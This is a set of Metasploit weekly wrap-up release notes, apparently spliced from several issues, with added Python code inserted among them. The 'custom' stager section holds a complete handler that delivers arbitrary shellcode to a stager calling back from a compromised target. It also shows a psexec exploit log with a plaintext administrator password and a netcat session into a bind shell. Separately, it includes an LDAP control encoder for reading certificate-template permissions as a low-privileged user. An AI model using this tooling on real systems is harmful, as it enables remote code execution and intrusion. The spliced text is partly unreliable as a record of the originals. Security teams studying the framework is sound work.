  • #17697 from jheysel-r7 - This updates the exploit/linux/http/froxlor_log_path_rce module to note that Froxlor 2.0.7 is the last vulnerable version.
  • #17700 from zeroSteiner - The argument validation for the route command has been reworked to improve the way it validates arguments and to print out more accurate error messages.

Documentation added (3)

  • #17680 from adfoster-r7 - Improves the UX of the docs.metasploit.com module explorer. Adds 'expand all' and 'collapse all' buttons to the module explorer. Adds support for automatically opening descendant folders that only contain 1 item. Adds an additional parent folder to make it clearer to the user that the folders are clickable.
  • #17687 from archcloudlabs - This PR contains additional examples on the ERB format required for the HTTPRawHeaders option for HTTP clients.
  • #17695 from zeroSteiner - The LDAP query and collection projects have been removed from the GSOC 2023 list since they have already been implemented in https://github.com/rapid7/metasploit-framework/pull/16598.

You can always find more documentation on our docsite at docs.metasploit.com.


Login brute-force utility

Metasploit Wrap-Up

Jan Rude added a new module that gives users the ability to brute-force login for Linux Syncovery. This expands Framework's capability to scan logins to Syncovery, a popular web GUI for backups.

WordPress extension SQL injection module

Cydave, destr4ct, and jheysel-r7 contributed a new module that takes advantage of a vulnerable WordPress extension. This allows Framework users to take advantage of CVE-2022-0739, leveraging a UNION-based SQL injection to gather hashed passwords of WordPress users. For vulnerable versions, anyone who can access the BookingPress plugin page will also have access to all the credentials in the database, yikes! There are currently 3,000 active installs of the plugin, which isn't a huge number by WordPress standards—but the ease of remote exploitation makes it a fun addition to the framework.

New module content (3)

Enhancements and features (2)

  • #17214 from h00die - This PR improves upon the data gathered on a vCenter server originally implemented in #16871, including library integration, optimization, and de-duplication.
  • #17332 from bcoles - Updates windows/gather/enum_proxy to support non-Meterpreter sessions (shell, PowerShell).

Bugs fixed (5)

  • #17183 from rbowes-r7 - This adds some small changes, cleanups, and fixes to the linux/http/zimbra_unrar_cve_2022_30333 and linux/http/zimbra_cpio_cve_2022_41352 Zimbra exploit modules, along with linux/local/zimbra_slapper_priv_esc documentation. Particularly, this fixes an issue that prevented the exploit modules from working properly when the handler was prematurely shut down.
  • #17305 from cgranleese-r7 - Updates Metasploit's RPC to automatically choose an appropriate payload if module.execute is invoked without a payload set. This mimics the functionality of msfconsole.
  • #17323 from h00die - Fixes a bug when attempting to detect enlightenment_sys in exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.
  • #17330 from zeroSteiner - This fixes an issue in the ProxyShell module, which limited the email enumeration to 100 entries. Now, it correctly enumerates all the emails before finding one that is suitable for exploitation.
  • #17342 from gwillcox-r7 - This adds the necessary control to the search queries used to find vulnerable certificate templates in an AD CS environment. Prior to this, non-privileged users would not be able to read the security descriptor field.
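The control behind that AD CS fix is LDAP_SERVER_SD_FLAGS. A search that reads nTSecurityDescriptor without it implicitly asks for all four parts of the descriptor, including the SACL, which needs SeSecurityPrivilege, so a plain domain user gets the attribute back empty and cannot see which certificate templates it can enrol in or modify. The example below is added here and is not Metasploit's own code: it encodes the control value (OID 1.2.840.113556.1.4.801, SDFlagsRequestValue ::= SEQUENCE { Flags INTEGER }, both from MS-ADTS) and decodes it back. The OWNER|GROUP|DACL flag set is an assumption, the usual choice for low-privileged enumeration; the page does not say which bits Metasploit's query requests. Attaching the control to a live search still needs an LDAP client (Rex::Proto::LDAP in Framework, ldap3 in Python), which is not shown.

```python
"""Build and parse the LDAP_SERVER_SD_FLAGS control value.

Added example, not Metasploit code. Pure Python, no LDAP library needed.
"""
LDAP_SERVER_SD_FLAGS_OID = "1.2.840.113556.1.4.801"

# SECURITY_INFORMATION bits carried in the control (MS-ADTS).
OWNER_SECURITY_INFORMATION = 0x01
GROUP_SECURITY_INFORMATION = 0x02
DACL_SECURITY_INFORMATION = 0x04
SACL_SECURITY_INFORMATION = 0x08

# Assumed flag set: everything an ordinary domain user may read.
# The SACL bit is left out because reading it needs SeSecurityPrivilege.
UNPRIVILEGED_SD_FLAGS = (OWNER_SECURITY_INFORMATION
                         | GROUP_SECURITY_INFORMATION
                         | DACL_SECURITY_INFORMATION)


def _ber_length(n: int) -> bytes:
    """Definite-form BER length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _ber_integer(value: int) -> bytes:
    """BER INTEGER for a non-negative value, minimal two's-complement bytes."""
    if value < 0:
        raise ValueError("flags are non-negative")
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:  # keep the sign bit clear
        body = b"\x00" + body
    return b"\x02" + _ber_length(len(body)) + body


def sd_flags_control_value(flags: int) -> bytes:
    """Encode SDFlagsRequestValue ::= SEQUENCE { Flags INTEGER }."""
    if flags & ~0x0F:
        raise ValueError("only the OWNER/GROUP/DACL/SACL bits are defined")
    inner = _ber_integer(flags)
    return b"\x30" + _ber_length(len(inner)) + inner


def sd_flags_control(flags: int = UNPRIVILEGED_SD_FLAGS) -> dict:
    """Control triple to attach to the search request. Criticality True makes
    a server that does not understand the control reject the search instead
    of silently answering without it (and returning no descriptors)."""
    return {
        "oid": LDAP_SERVER_SD_FLAGS_OID,
        "criticality": True,
        "value": sd_flags_control_value(flags),
    }


def _read_tlv(buf: bytes, pos: int, expected_tag: int):
    """Return (contents, end_offset) of the TLV at pos, checking the tag."""
    if pos >= len(buf) or buf[pos] != expected_tag:
        raise ValueError(f"expected tag 0x{expected_tag:02x} at offset {pos}")
    pos += 1
    length = buf[pos]
    pos += 1
    if length & 0x80:  # long form
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated TLV")
    return buf[pos:end], end


def decode_sd_flags(value: bytes) -> int:
    """Parse a control value back into its flags, rejecting trailing junk."""
    seq, end = _read_tlv(value, 0, 0x30)
    if end != len(value):
        raise ValueError("trailing bytes after SEQUENCE")
    num, end = _read_tlv(seq, 0, 0x02)
    if end != len(seq):
        raise ValueError("trailing bytes after INTEGER")
    return int.from_bytes(num, "big", signed=True)


if __name__ == "__main__":
    ctl = sd_flags_control()
    print(ctl["oid"], ctl["value"].hex(), decode_sd_flags(ctl["value"]))
```

For flags 7 the value is the five bytes 30 03 02 01 07; pass it as the control value with the search for (objectClass=pKICertificateTemplate) and the DACL comes back for any authenticated user.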


BYOS: Bring your own stager

Metasploit Weekly Wrap-Up

We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” A “custom” payload is a standard Metasploit stager whose stage, instead of Meterpreter or a shell, is whatever shellcode you send it.

Got a third-party payload you want to run, like Sliver, or a payload that’s too big or has too many bad characters to use directly in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the SHELLCODE_FILE option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory, place the shellcode there and jump into it.
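A handler for that protocol is short enough to write yourself. The one below is an added example, not Metasploit's handler or any part of Framework: it listens on LHOST:LPORT, waits for the stager to connect back, and sends the length prefix followed by the stage, then exits, so there is no "session" afterwards, exactly like the console output further down. It assumes the length prefix is a 32-bit little-endian unsigned integer, which is what the framework's reverse_tcp stagers read; if you pair it with a different stager, change STAGE_LEN_FMT. The fake_stager and roundtrip functions are test scaffolding that emulate the receive side of a stager on loopback; SAMPLE_STAGE is constructed filler, not real shellcode.

```python
"""Stand-alone handler for Metasploit 'custom' stagers.

Added example, not Metasploit code. Wire format (assumed, matches the
framework's reverse_tcp stagers): <u32 little-endian length><stage bytes>.
"""
import socket
import struct
import sys
import threading

STAGE_LEN_FMT = "<I"                      # assumed length-prefix format
STAGE_LEN_SIZE = struct.calcsize(STAGE_LEN_FMT)
MAX_STAGE_LEN = 0xFFFFFFFF

# Constructed placeholder for offline testing, not real shellcode.
SAMPLE_STAGE = b"\xcc" * 8 + bytes(range(256))


def frame_stage(shellcode: bytes) -> bytes:
    """Build the message a custom stager expects: <length><shellcode>."""
    if not shellcode:
        raise ValueError("refusing to send an empty stage")
    if len(shellcode) > MAX_STAGE_LEN:
        raise ValueError("stage does not fit a 32-bit length prefix")
    return struct.pack(STAGE_LEN_FMT, len(shellcode)) + shellcode


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() until exactly n bytes have arrived; stagers loop the same way."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


def serve_stage(shellcode: bytes, lhost: str = "0.0.0.0", lport: int = 4567,
                timeout: float = 60.0, on_listen=None) -> int:
    """Listen once on lhost:lport, push the framed stage to the first stager
    that connects back, then close. Returns the number of bytes sent.
    There is no session afterwards: whatever the shellcode set up (a bind
    shell, a C2 implant) is yours to connect to separately.
    on_listen(port) is an optional callback fired once the socket is bound."""
    framed = frame_stage(shellcode)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((lhost, lport))
        srv.listen(1)
        srv.settimeout(timeout)
        if on_listen is not None:
            on_listen(srv.getsockname()[1])
        conn, peer = srv.accept()
        with conn:
            conn.sendall(framed)
            print(f"[+] sent {len(shellcode)}-byte custom stage to {peer[0]}:{peer[1]}")
    return len(framed)


def fake_stager(lhost: str, lport: int) -> bytes:
    """Receive side of a stager, for offline testing: connect back, read the
    length prefix, then read exactly that many bytes of stage."""
    with socket.create_connection((lhost, lport), timeout=5.0) as s:
        (length,) = struct.unpack(STAGE_LEN_FMT, recv_exact(s, STAGE_LEN_SIZE))
        return recv_exact(s, length)


def roundtrip(shellcode: bytes) -> bytes:
    """Run handler and fake stager against each other on loopback using an
    ephemeral port; returns what the stager would have jumped into."""
    ready = threading.Event()
    bound = {}

    def on_listen(port: int) -> None:
        bound["port"] = port
        ready.set()

    worker = threading.Thread(target=serve_stage,
                              args=(shellcode, "127.0.0.1", 0, 10.0, on_listen),
                              daemon=True)
    worker.start()
    if not ready.wait(10.0):
        raise RuntimeError("handler never started listening")
    staged = fake_stager("127.0.0.1", bound["port"])
    worker.join(10.0)
    return staged


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <shellcode.bin> <lport>")
    with open(sys.argv[1], "rb") as fh:
        serve_stage(fh.read(), lport=int(sys.argv[2]))
```

To use it in place of Framework's handler, start it with the .bin file and the port from the payload's LPORT, then in msfconsole pick the same custom payload with matching LHOST/LPORT and set the exploit's advanced option DisablePayloadHandler to true so Framework does not bind the port itself. The stager only ever sees the length and the bytes, so nothing about the stage needs to be bad-character free; only the stager delivered by the exploit does.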

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
                                                    ng-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] 10.5.132.159:445 - Connecting to the server...

<hacking intensifies>

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500


[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:

[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Module added to exploit OS Command Injection in PAN-OS

Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits CVE-2020-2038, an OS command injection vulnerability in PAN-OS. The vulnerability affects PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS is the operating system behind one of the leading enterprise firewalls, the Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database rates the vulnerability High (CVSS 7.2): it requires administrator credentials, but an administrator can use it to execute arbitrary commands with root privileges. The root cause is the management API not sufficiently filtering input to its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.

New module content (4)

  • SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 - This adds support for EIP-0f5d2d7f, an authenticated SQL injection in the uid parameter of the index.php?entryPoint=export page of SuiteCRM 7.x prior to 7.12.6. The module exploits this SQL injection vulnerability to extract the usernames and password hashes for SuiteCRM users, which can then be cracked offline later to gain access to SuiteCRM.

  • Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 - This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface, versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and versions 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

  • #16521 from bwatters-r7 - This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

  • #16906 from bcoles - This improves the post/windows/gather/enum_snmp module with shell and PowerShell session support, and fixes issues that low-privileged sessions would run into while reading the registry.

Enhancements and features (5)

  • #16911 from bcoles - This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
  • #16929 from bcoles - The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
  • #16930 from bcoles - This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
  • #16953 from bcoles - The enum_domain script has been updated to support PowerShell and shell sessions, and its documentation and code have been cleaned up.
  • #17008 from EmilioPanti - rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn't being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.

Bugs fixed (5)

  • #16928 from bcoles - Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
  • #16998 from adfoster-r7 - Fixes a crash in modules using the IAX2 client.
  • #17013 from zeroSteiner - This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
  • #17014 from adfoster-r7 - This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
  • #17018 from adfoster-r7 - This fixes the route add command to use a sensible default netmask.
